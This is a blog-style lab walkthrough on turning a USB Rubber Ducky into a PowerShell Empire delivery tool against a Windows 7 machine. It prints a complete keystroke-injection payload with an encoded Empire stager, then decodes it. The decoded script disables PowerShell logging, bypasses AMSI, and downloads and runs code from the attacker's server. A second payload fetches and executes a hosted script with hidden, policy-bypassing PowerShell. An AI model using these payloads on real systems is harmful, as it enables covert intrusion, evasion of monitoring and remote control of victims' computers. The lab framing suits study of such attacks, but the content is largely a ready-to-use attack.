Gaining a foodhold: The Rubber Ducky and Powershell Empire

So, I recently acquired my first rubber ducky and I've been messing around with it quite a bit. I wanted to document the basic setup and provide some links for further reading.

All of my write-ups are conducted in a lab, but I try to emulate what can happen in real life. In our example below, I want to emulate a rubber ducky being plugged into a corporate managed windows device. This could have been done by either an attacker gaining physical access and plugging the rubber ducky in directly, or as done in past years, dropping them in parking lots and having employees pick them up and plugging them into their workstation. Either way, let's demonstrate what can happen.

We will be utilizing Kali as our payload generating machine and PowerShell Empire Server; and we will be attacking a Windows 7 host.

To start, we need to make sure we know which pieces of the rubber ducky do what. In it's simplest form, we will be utilizing 3 pieces. The micro SD card that carry our payload, the USB that allows us to write to it, the USB that will be delivering our payload.

USB used to write payload

USB to deliver payload

To begin, we make sure we can access our USB (if you're using VirtualBox, you'll need to install the extensions). We insert the micro SD card into our delivery USB and plug it in. Once complete, your Kali VM should have visibility into the Ducky.

Now that our Ducky is connected, it's time to write some payloads. You'll want to have the Ducky Encoder which can be found on Hak5darren's github.

Once you have the duckencoder, let's write a payload that will create a PowerShell Empire Agent to our attacking machine. We start up empire and create a listener. We then use "stager/windows/ducky", add our listener and execute. And look at that! We have our entire payload created for us!

DELAY 3000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRING powershell -W Hidden -nop -noni -enc SQBGACgAJABQAFMAVgBlAFIAUwBJAG8AbgBUAGEAYgBMAGUALgBQAFMAVgBlAHIAcwBpAG8ATgAuAE0AQQBKAG8AcgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAUgBFAEYAXQAuAEEAUwBzAEUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAGkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAGEATAB1AGUAKAAkAE4AdQBMAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBMAD0AWwBDAG8ATABsAGUAYwBUAGkATwBOAFMALgBHAGUATgBlAFIAaQBDAC4ARABJAGMAVABJAG8AbgBhAHIAWQBbAFMAVAByAGkATgBHACwAUwB5AHMAVABlAE0ALgBPAGIAagBFAGMAVABdAF0AOgA6AG4AZQBXACgAKQA7ACQAVgBBAGwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAGwALgBBAEQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAGUAewBbAFMAYwByAGkAUABUAEIATABvAGMASwBdAC4AIgBHAEUAdABGAGkARQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBhAGwAVQBFACgAJABuAHUATABsACwAKABOAEUAVwAtAE8AQgBqAEUAYwB0ACAAQwBPAGwATABFAEMAVABJAE8ATgBzAC4ARwBlAE4ARQBSAEkAYwAuAEgAQQBTAEgAUwBFAHQAWwBTAHQAcgBpAG4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBzAEUAbQBiAGwAeQAuAEcAZQBUAFQAWQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBFAHQARgBpAGUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAEEATAB1AGUAKAAkAG4AdQBMAGwALAAkAFQAUgBVAEUAKQB9ADsAfQA7AFsAUwBZAFMAVABFAG0ALgBOAGUAdAAuAFMAZQByAFYAaQBjAEUAUABPAGkAbgBUAE0AQQBuAEEAZwBFAFIAXQA6ADoARQBYAFAAZQBDAHQAMQAwADAAQwBPAE4AVABJAG4AdQBlAD0AMAA7ACQAdwBDAD0ATgBFAFcALQBPAGIAagBlAGMAVAAgAFMAWQBzAHQAZQBNAC4ATgBFAHQALgBXAEUAYgBDAEwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAFcAYwAuAEgAZQBBAGQARQBSAFMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAUgBPAHgAWQA9AFsAUwBZAFMAVABlAE0ALgBOAGUAVAAuAFcAZQBiAFIAZQBRAFUARQBTAFQAXQA6ADoARABlAEYAYQB1AGwAVABXAGUAYgBQAHIATwB4AHkAOwAkAHcAYwAuAFAAUgBPAFgAeQAuAEMAcgBlAEQARQBuAFQAaQBBAGwAUwAgAD0AIABbAFMAWQBzAFQARQBNAC4ATgBFAFQALgBDAFIARQBEAGUATgBUAEkAQQBMAEMAQQBDAEgARQBdADoAOgBEAEUARgBhAFUATABUAE4ARQBUAFcAbwBSAEsAQwBSAEUAZABlAG4AdABpAGEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AFMAdABlAE0ALgBUAGUAWABUAC4ARQBOAGMAbwBkAEkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQBUAEIAWQB0AGUAUwAoACcASgAlAFAASQBdACYATQA2AEsAVQApAE8AIwA/AFcANwB6AFsARABZAHIAZgBSAHYAPABfAGgAdQB3AHsALAAvACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAHUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAWABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4ANQAwAC4AMQAwADEAOgA4ADgAOAA4ACcAOwAkAHQAPQAnAC8AYQBkAG0AaQBuAC8AZwBlAHQALgBwAGgAcAAnADsAJAB3AEMALgBIAGUAYQBEAGUAcgBzAC4AQQBEAEQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHMAZQBzAHMAaQBvAG4APQBTACsASgAyAGUAcQBvAFQARwBEAEsAcgA4AGsAMQA0AHQAWQBVAFIAUwBDAEcAdABiAEUAcwA9ACIAKQA7ACQAZABBAHQAYQA9ACQAVwBDAC4ARABvAHcATgBMAG8AQQBEAEQAQQBUAGEAKAAkAFMARQBSACsAJAB0ACkAOwAkAGkAdgA9ACQAZABhAHQAYQBbADAALgAuADMAXQA7ACQAZABBAHQAYQA9ACQARABhAHQAYQBbADQALgAuACQAZABBAHQAQQAuAGwARQBOAEcAdABoAF0AOwAtAEoAbwBpAE4AWwBDAGgAQQBSAFsAXQBdACgAJgAgACQAUgAgACQARABBAHQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA 
ENTER

We take these commands and insert into a file we called "PSEmpireDucky.txt"

We then execute the duckencoder and select our input file "PSEmpireDucky.txt". This generates a inject.bin file in which we will copy to our rubber ducky as shown below:

root@kali:~/LAB/RubberDucky# java -jar duckencoder.jar -i PSEmpireDucky.txt 
Hak5 Duck Encoder 2.6.3

Loading File .....  [ OK ]
Loading Keyboard File ..... [ OK ]
Loading Language File ..... [ OK ]
Loading DuckyScript ..... [ OK ]
DuckyScript Complete..... [ OK ]

root@kali:~/LAB/RubberDucky# ls
duckencoder.jar  inject.bin  PSEmpireDucky.txt
root@kali:~/LAB/RubberDucky# cp inject.bin /media/root/Ducky/
root@kali:~/LAB/RubberDucky# ls /media/root/Ducky/
inject.bin
root@kali:~/LAB/RubberDucky# 

Now with our ducky created, we can remove the USB, remove the SD card from the USB and insert it into the USB that will be used to deliver the payload.

We then plug the rubber ducky into the victim Windows 7 machine. As shown below, the ducky successfully runs on our Windows 7 target and an agent is spawned on our Kali machine:

However, during testing, this took a lot of time for the powershell script to write in the terminal and to execute. Roughly 30 seconds. We may not have this much time. So, what can we do to not only speed this up, but to add more stealth?

An option would be to have this powershell empire payload hosted somewhere, and then we just use the ducky to run powershell to download the payload and execute.

To do this, take the powershell empire code that was originally generated and decode it:

root@kali:/var/www/html# echo "SQBGACgAJABQAFMAVgBlAFIAUwBJAG8AbgBUAGEAYgBMAGUALgBQAFMAVgBlAHIAcwBpAG8ATgAuAE0AQQBKAG8AcgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAUgBFAEYAXQAuAEEAUwBzAEUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAGkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAGEATAB1AGUAKAAkAE4AdQBMAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBMAD0AWwBDAG8ATABsAGUAYwBUAGkATwBOAFMALgBHAGUATgBlAFIAaQBDAC4ARABJAGMAVABJAG8AbgBhAHIAWQBbAFMAVAByAGkATgBHACwAUwB5AHMAVABlAE0ALgBPAGIAagBFAGMAVABdAF0AOgA6AG4AZQBXACgAKQA7ACQAVgBBAGwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAGwALgBBAEQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAGUAewBbAFMAYwByAGkAUABUAEIATABvAGMASwBdAC4AIgBHAEUAdABGAGkARQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBhAGwAVQBFACgAJABuAHUATABsACwAKABOAEUAVwAtAE8AQgBqAEUAYwB0ACAAQwBPAGwATABFAEMAVABJAE8ATgBzAC4ARwBlAE4ARQBSAEkAYwAuAEgAQQBTAEgAUwBFAHQAWwBTAHQAcgBpAG4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBzAEUAbQBiAGwAeQAuAEcAZQBUAFQAWQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBFAHQARgBpAGUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAEEATAB1AGUAKAAkAG4AdQBMAGwALAAkAFQAUgBVAEUAKQB9ADsAfQA7AFsAUwBZAFMAVABFAG0ALgBOAGUAdAAuAFMAZQByAFYAaQBjAEUAUABPAGkAbgBUAE0AQQBuAEEAZwBFAFIAXQA6ADoARQBYAFAAZQBDAHQAMQAwADAAQwBPAE4AVABJAG4AdQBlAD0AMAA7ACQAdwBDAD0ATgBFAFcALQBPAGIAagBlAGMAVAAgAFMAWQBzAHQAZQBNAC4ATgBFAHQALgBXAEUAYgBDAEwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAFcAYwAuAEgAZQBBAGQARQBSAFMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAUgBPAHgAWQA9AFsAUwBZAFMAVABlAE0ALgBOAGUAVAAuAFcAZQBiAFIAZQBRAFUARQBTAFQAXQA6ADoARABlAEYAYQB1AGwAVABXAGUAYgBQAHIATwB4AHkAOwAkAHcAYwAuAFAAUgBPAFgAeQAuAEMAcgBlAEQARQBuAFQAaQBBAGwAUwAgAD0AIABbAFMAWQBzAFQARQBNAC4ATgBFAFQALgBDAFIARQBEAGUATgBUAEkAQQBMAEMAQQBDAEgARQBdADoAOgBEAEUARgBhAFUATABUAE4ARQBUAFcAbwBSAEsAQwBSAEUAZABlAG4AdABpAGEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AFMAdABlAE0ALgBUAGUAWABUAC4ARQBOAGMAbwBkAEkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQBUAEIAWQB0AGUAUwAoACcASgAlAFAASQBdACYATQA2AEsAVQApAE8AIwA/AFcANwB6AFsARABZAHIAZgBSAHYAPABfAGgAdQB3AHsALAAvACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAHUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAWABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4ANQAwAC4AMQAwADEAOgA4ADgAOAA4ACcAOwAkAHQAPQAnAC8AYQBkAG0AaQBuAC8AZwBlAHQALgBwAGgAcAAnADsAJAB3AEMALgBIAGUAYQBEAGUAcgBzAC4AQQBEAEQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHMAZQBzAHMAaQBvAG4APQBTACsASgAyAGUAcQBvAFQARwBEAEsAcgA4AGsAMQA0AHQAWQBVAFIAUwBDAEcAdABiAEUAcwA9ACIAKQA7ACQAZABBAHQAYQA9ACQAVwBDAC4ARABvAHcATgBMAG8AQQBEAEQAQQBUAGEAKAAkAFMARQBSACsAJAB0ACkAOwAkAGkAdgA9ACQAZABhAHQAYQBbADAALgAuADMAXQA7ACQAZABBAHQAYQA9ACQARABhAHQAYQBbADQALgAuACQAZABBAHQAQQAuAGwARQBOAEcAdABoAF0AOwAtAEoAbwBpAE4AWwBDAGgAQQBSAFsAXQBdACgAJgAgACQAUgAgACQARABBAHQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA" | base64 -d
IF($PSVeRSIonTabLe.PSVersioN.MAJor -gE 3){$GPF=[REF].ASsEmbly.GetType('System.Management.Automation.Utils')."GeTFiE`ld"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GETVaLue($NuLl);If($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VAL=[CoLlecTiONS.GeNeRiC.DIcTIonarY[STriNG,SysTeM.ObjEcT]]::neW();$VAl.Add('EnableScriptB'+'lockLogging',0);$Val.ADD('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VaL}ELSe{[ScriPTBLocK]."GEtFiE`LD"('signatures','N'+'onPublic,Static').SeTValUE($nuLl,(NEW-OBjEct COlLECTIONs.GeNERIc.HASHSEt[String]))}[Ref].ASsEmbly.GeTTYpE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFieLd('amsiInitFailed','NonPublic,Static').SeTVALue($nuLl,$TRUE)};};[SYSTEm.Net.SerVicEPOinTMAnAgER]::EXPeCt100CONTInue=0;$wC=NEW-ObjecT SYsteM.NEt.WEbCLient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$Wc.HeAdERS.Add('User-Agent',$u);$WC.PROxY=[SYSTeM.NeT.WebReQUEST]::DeFaulTWebPrOxy;$wc.PROXy.CreDEnTiAlS = [SYsTEM.NET.CREDeNTIALCACHE]::DEFaULTNETWoRKCREdentiaLs;$Script:Proxy = $wc.Proxy;$K=[SySteM.TeXT.ENcodINg]::ASCII.GETBYteS('J%PI]&M6KU)O#?W7z[DYrfRv<_huw{,/');$R={$D,$K=$ArgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COunT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXoR$S[($S[$I]+$S[$H])%256]}};$ser='http://10.10.50.101:8888';$t='/admin/get.php';$wC.HeaDers.ADD("Cookie","session=S+J2eqoTGDKr8k14tYURSCGtbEs=");$dAta=$WC.DowNLoADDATa($SER+$t);$iv=$data[0..3];$dAta=$Data[4..$dAtA.lENGth];-JoiN[ChAR[]](& $R $DAta ($IV+$K))|IEX
root@kali:/var/www/html# 

Once we have the decoded powershell script, we save it to a file "PS-DuckyExploit.html" and use python to start a simple http server on port 8080. Additionally, we update our Rubber Ducky payload by limiting the Delay, executing powershell with a hidden window and downloading our empire payload from our attacking machines IP and port.

root@kali:~/LAB/RubberDucky# cat PSEmpireDucky-Download.txt 
DELAY 500
GUI r   

DELAY 100    

STRING powershell -ep bypass -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.50.101:8080/PS-DuckyExploit.html')"
ENTER
root@kali:~/LAB/RubberDucky# java -jar duckencoder.jar -i PSEmpireDucky-Download.txt -o /media/root/Ducky/inject.bin
Hak5 Duck Encoder 2.6.3

Loading File .....  [ OK ]
Loading Keyboard File ..... [ OK ]
Loading Language File ..... [ OK ]
Loading DuckyScript ..... [ OK ]
DuckyScript Complete..... [ OK ]

root@kali:~/LAB/RubberDucky# ls
duckencoder.jar  inject.bin  PS-DuckyExploit.html  PSEmpireDucky-Download.txt  PSEmpireDucky.txt
root@kali:~/LAB/RubberDucky# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...

We then put our micro SD back in our rubber ducky and deploy it on our Windows 7 machine:

Success! This script only took a few seconds to execute and we were successfully able to receive a shell.

Now, in order to bypass any security controls, you would want to tinker around with obfuscation and encryption, however, the basics are already laid out.

Hope this has been helpful!

Until next time.

-geoda